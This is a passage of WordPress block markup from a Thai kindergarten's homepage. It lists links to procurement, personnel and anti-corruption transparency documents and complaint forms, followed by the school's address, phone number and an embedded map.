900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe 